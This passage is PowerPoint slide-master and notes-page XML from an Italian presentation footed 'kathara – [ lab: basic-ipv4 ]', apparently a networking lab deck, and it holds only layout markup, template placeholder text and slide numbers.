        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="94348" tIns="47174" rIns="94348" bIns="47174" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="942975" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F1BC941-16DF-98FF-CB37-D7C03C63A163}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3887788" y="0"/>
            <a:ext cx="2970212" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="94348" tIns="47174" rIns="94348" bIns="47174" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="942975" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40964" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3999CB24-7705-8839-F27F-CB9418020BD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8686800"/>
            <a:ext cx="2970213" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="94348" tIns="47174" rIns="94348" bIns="47174" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="942975" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40965" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16766185-E6AC-3A87-47CA-6D5A36F5D062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3887788" y="8686800"/>
            <a:ext cx="2970212" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="94348" tIns="47174" rIns="94348" bIns="47174" numCol="1" anchor="b" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="942975">
              <a:defRPr sz="1200">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D9B21AD7-4E97-4BBB-9C48-E1CC7B3A37AF}" type="slidenum">
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹N›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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5A949644-F96C-EAC7-3E3E-56F48A62C58B}"/>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it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158723" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3649D4-8039-578B-AF67-290E126ACABD}"/>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anose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{830E5E8D-FA8A-7186-04B2-911243E4E297}"/>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it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158725" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F048C03-4E78-0AA4-B955-669BA3B45BE4}"/>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it-IT" altLang="it-IT" noProof="0"/>
              <a:t>Fare clic per modificare gli stili del testo dello schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" noProof="0"/>
              <a:t>Secondo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" noProof="0"/>
              <a:t>Terzo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" noProof="0"/>
              <a:t>Quarto livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" noProof="0"/>
              <a:t>Quinto livello</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158726" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BCD15B4-EBC6-89A1-E714-4DDE7CB35D08}"/>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it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158727" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{740A47DB-2B4A-3C5F-52F7-3626F51A0543}"/>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1D51CE57-2978-4D98-BB34-00CF222BA340}"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50EA6688-FAC1-BA53-B4E1-1E6EE265E76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E14072C-BEA4-481C-9C2B-A131F83CF95F}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7171" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F64D250-C750-CD21-6AB1-DF85BBBEC26A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6879648F-823A-6632-9B79-89B2D268FB8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lt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F89A1-D749-824B-7BA1-C61075012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8CA32-CD1D-E037-C893-B76B61694AD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{311338AA-BFFD-E6AE-BFBD-6ACAF372FF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7EC27C-AAC6-6918-42D0-1BFA0A1EEA65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1D51CE57-2978-4D98-BB34-00CF222BA340}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3180492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txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>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a:defRPr/>
            </a:pPr>
            <a:fld id="{1D51CE57-2978-4D98-BB34-00CF222BA340}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="65247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txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>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a:defRPr/>
            </a:pPr>
            <a:fld id="{1D51CE57-2978-4D98-BB34-00CF222BA340}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4286331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A7CAC-5627-3E75-2D3B-EA537E68396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1401E63-9762-2CBC-AC47-760FE5FE0006}"/>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3DE4C8EB-C946-6AA0-6838-032C75854199}"/>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01DAF281-E80B-AAB7-FCFB-BA2C21A673B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1D51CE57-2978-4D98-BB34-00CF222BA340}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2554064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FF496-97D0-F2C3-A3BB-DBA7A9EFF8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9B981-2F0A-D2AA-4840-3E2F16192390}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C30D86-4B8E-3FB2-3820-E577C3185A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21DE62-AEAE-D97B-BCE2-C53A5F83125E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1D51CE57-2978-4D98-BB34-00CF222BA340}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="921541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5A2CD-F32B-EF69-2FE2-BD2F6C71A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A61B76-52FA-E271-BA9C-1F369DC61E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFDE9409-1395-1AF3-0610-DFB3115E35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5D8545-05E5-7A47-9724-89A795E9C32F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1D51CE57-2978-4D98-BB34-00CF222BA340}" type="slidenum">
              <a:rPr lang="it-IT" altLang="it-IT" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>71</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395881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lab">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304130" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1988840"/>
            <a:ext cx="10363200" cy="866775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2996952"/>
            <a:ext cx="8534400" cy="695325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del sottotitolo dello schema</a:t>
            </a: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7B150B1F-FA08-F63A-3429-F7F8A760D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88" y="150788"/>
            <a:ext cx="4234565" cy="945842"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28474575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5486F16B-0B58-45B6-9061-CA60B6CB76B3}"/>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5" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D754CCF-D619-4891-8E0C-E8A44AB624BA}"/>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4234752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41"/>
            <a:ext cx="2743200" cy="5851525"/>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609601" y="274641"/>
            <a:ext cx="8042031"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06ABEC1F-57AF-4AF1-B41E-3F8C58106046}"/>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5" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAC44205-C96E-4D3D-B0E4-CEBDE5B2D649}"/>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3091692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pyrigh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9400-AFF6-4FC9-8E2F-F363C6F6602C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>copyright </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" err="1"/>
              <a:t>notice</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC95E1F6-EE88-4027-874C-C2A60CB4012A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{684B42B5-5FDC-4B42-887A-B68A97D000BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C412A2-966A-4BF2-921A-CFBA729795EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1412876"/>
            <a:ext cx="10972800" cy="4713288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>Fare clic per modificare gli stili del testo dello schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>Secondo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>Terzo livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>Quarto livello</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" sz="1800"/>
              <a:t>Quinto livello</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38122584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C402-67A5-4652-B395-80C3CFCC7964}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2286000"/>
            <a:ext cx="10972800" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Fare clic per modificare lo stile del titolo dello schema</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662A33B8-9C12-4DD4-B7A2-462DBDF9FD58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
